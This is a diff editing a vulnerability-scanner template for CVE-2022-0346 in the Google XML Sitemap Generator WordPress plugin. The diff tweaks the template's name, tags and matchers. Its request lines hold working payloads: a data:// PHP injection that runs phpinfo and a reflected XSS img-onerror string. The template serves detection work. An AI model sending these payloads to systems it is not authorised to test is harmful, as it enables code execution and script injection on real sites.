diff --git a/cves/2022/CVE-2022-0346.yaml b/cves/2022/CVE-2022-0346.yaml
index 2d039d8e46..f8ef95b9b3 100644
--- a/cves/2022/CVE-2022-0346.yaml
+++ b/cves/2022/CVE-2022-0346.yaml
@@ -1,7 +1,7 @@
id: CVE-2022-0346
info:
- name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
+ name: Google XML Sitemap Generator < 2.0.4 - Cross-Site Scripting & RCE
author: Akincibor
severity: medium
description: |
@@ -16,8 +16,8 @@ info:
cve-id: CVE-2022-0346
cwe-id: CWE-79
metadata:
- verified: "true"
- tags: xss,wp,wordpress,wp-plugin,cve,cve2022,wpscan
+ verified: true
+ tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
requests:
- method: GET
@@ -25,13 +25,14 @@ requests:
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
+ stop-at-first-match: true
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
- - "status_code==200 && contains(body_2, '') || contains(body_2, 'Invalid Renderer type specified')"
+ - "status_code==200 && contains(body_2, '') && contains(body_2, 'Invalid Provider type specified')"
condition: or
- type: word